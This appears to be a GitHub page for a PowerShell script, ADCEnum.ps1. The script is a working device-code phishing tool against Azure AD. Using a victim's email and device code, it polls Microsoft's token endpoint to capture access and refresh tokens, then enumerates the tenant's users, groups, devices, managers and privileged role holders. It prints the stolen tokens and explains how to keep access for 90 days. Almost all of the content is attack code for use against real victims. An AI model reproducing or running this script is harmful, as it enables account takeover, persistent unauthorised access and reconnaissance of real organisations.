-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathADCEnum.ps1
172 lines (134 loc) · 6.74 KB
/
ADCEnum.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
<# STEPS TO RUN
1. Copy ADCEnum.ps1 to TokenTactics directory
2. Install-Module AzureAD
3. Ensure script is updated with victim EMAIL & DEVICE_CODE
4. Save console output to file) by running the command: Start-Transcript -Path C:\Temp\
5. EXECUTE SCRIPT: .\ADCEnum.ps1
6. Stop-Transcript
#>
Write-Warning "[!] Ensure 'Start-Transcript -Path <...>' is executed. Run 'Stop-Transcript' after execution completes."
Write-Warning "[!] Ensure TokenTactics is present in the same directory"
Write-Warning "[!] Ensure script is updated with victim EMAIL & DEVICE_CODE"
<#
---------------------------------------------
Content of ADCEnum script begins:
---------------------------------------------
#>
#MODIFY EMAIL & DEVICE_CODE HERE
$email = "<ENTER VICTIM EMAIL ID>"
$victim_device_code = "<ENTER VICTIM's DEVICE_CODE>"
$continue = $true
$interval = "5"
$expires = "900"
Start-Sleep -Seconds 2
Write-Host "[+] Importing TokenTactics"
Import-Module .\TokenTactics.psd1
Write-Host "[+] Importing Azure AD"
Import-Module AzureAD
Write-Host "=====================================================================================================`n`n"
# Create body for authentication requests
$body=@{
"client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $victim_device_code
"resource" = "https://graph.microsoft.com"
}
# Loop while authorisation is pending or until timeout exceeded
while($continue)
{
Start-Sleep -Seconds $interval
$total += $interval
if($total -gt $expires)
{
Write-Error "Timeout occurred"
return
}
# Try to get the response. Will give 40x while pending so we need to try&catch
try
{
$response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0 " -Body $body -ErrorAction SilentlyContinue
}
catch
{
# This is normal flow, always returns 40x unless successful
$details=$_.ErrorDetails.Message | ConvertFrom-Json
$continue = $details.error -eq "authorization_pending"
Write-Host $details.error
if(!$continue)
{
# Not pending so this is a real error
Write-Error $details.error_description
return
}
}
# If we got response, all okay!
if($response)
{
Write-Host "[+] Tokens received! Authenticated to Azure AD as $email"
break # Exit the loop
}
}
$connection = Connect-AzureAD -AadAccessToken $response.access_token -AccountId $email
Write-Output $connection
Write-Host "[+] Initiating Domain Enumeration"
#User enumeration
Write-Host "`n[+] Extracting AD Users"
#$allusers = Get-AzureADUser -All $true
#Write-Host "`n[+] $allusers.Count users found"
Write-Host "`nDisplaying user information - Limiting to 10`n"
Get-AzureADUser -Top 10 | Select DisplayName, UserPrincipalName, UserType
#Group Enumeration
Write-Host "=====================================================================================================`n`n[+] Extracting AD Groups"
#$allgroups = Get-AzureADGroup -All $true
#Write-Host "`n[+] " + $allgroups.Count + " groups found"
Write-Host "`nDisplaying group information - Limiting to 10"
Get-AzureADGroup -Top 10 | Select DisplayName, Description
#Device Enumeration
Write-Host "=====================================================================================================`n`n[+] Extracting registered devices"
#$alldevices = Get-AzureADDevice -All $true
#Write-Host "`n[+] " + $alldevices.Count + " devices found"
Write-Host "Displaying device names - Limiting to 10"
Get-AzureADDevice -Top 10 | Select DisplayName
#Targeted User Enumeration
Write-Host "==========================================================================================================================================================================================================`n[+] Initiating targetted user enumeration"
#Display user's groups
Write-Host "=====================================================================================================`n`n[+] Identifying user's group memberships"
$objectid = (Get-AzureADUser -ObjectId $email).ObjectId
Get-AzureADUserMembership -ObjectId $objectid | Select DisplayName, Description
#Display user's extension
Write-Host "=====================================================================================================`n`n[+] Identifying user's extension"
Get-AzureADUserExtension -ObjectId $objectid
#Display User's manager
Write-Host "=====================================================================================================`n`n[+] Identifying security products in target environment, user's manager, Company details"
Get-AzureADUserManager -ObjectId $objectid | Select AssignedPlans, PhysicalDeliveryOfficeName, City, Country,PostalCode,CompanyName, Department, DisplayName, JobTitle,UserPrincipalName,Mail, MailNickName, Mobile, OnPremisesSecurityIdentifier
#Registered Device Name
Write-Host "=====================================================================================================`n`n[+] Identifying user's device name"
Get-AzureADUserOwnedDevice -ObjectId $objectid | Select DeviceId, DisplayName
#Display owned objects
Write-Host "=====================================================================================================`n`n[+] Identifying objects owned by user"
Get-AzureADUserOwnedObject -ObjectId $objectid | Select ObjectType,Description,Mail
#Privileged User Enumeration
Write-Host "=====================================================================================================`n`n[+] Identifying users with privileged roles"
Get-AzureADDirectoryRole | Foreach-Object {
$Role = $_
$RoleMembers = Get-AzureADDirectoryRoleMember -ObjectId $Role.ObjectID
ForEach ($Member in $RoleMembers){
$RoleMembership = [PSCustomObject]@{
MemberName = $Member.DisplayName
MemberID = $Member.ObjectID
MemberOnPremID = $Member.OnPremisesSecurityIdentifier
MemberUPN = $Member.UserPrincipalName
MemberType = $Member.ObjectType
RoleID = $Role.RoleTemplateID
RoleName = Get-AzureADDirectoryRole | ?{$_.RoleTemplateId -eq $Role.RoleTemplateID} | Select DisplayName
}
$RoleMembership
}
}
Write-Host $RoleMembership
Write-Host "`n`n[+] Access Token: "
Write-Host $response.access_token
Write-Host "`n[+] Refresh Token: "
Write-Host $response.refresh_token
Write-Host "`nAccess Token valid for about 60 minutes.`nIf expired, use the Refresh Token to renew access tokens. (Valid for over 90 days)`nRefreshTo-GraphToken -domain <Domain> -refreshToken $refresh_token`nConnect-AzureAD -AadAccessToken $GraphToken.access_token -AccountId $email"
Write-Host "`n`n======== To better visualize enumerated information, import data into AzureHound ======="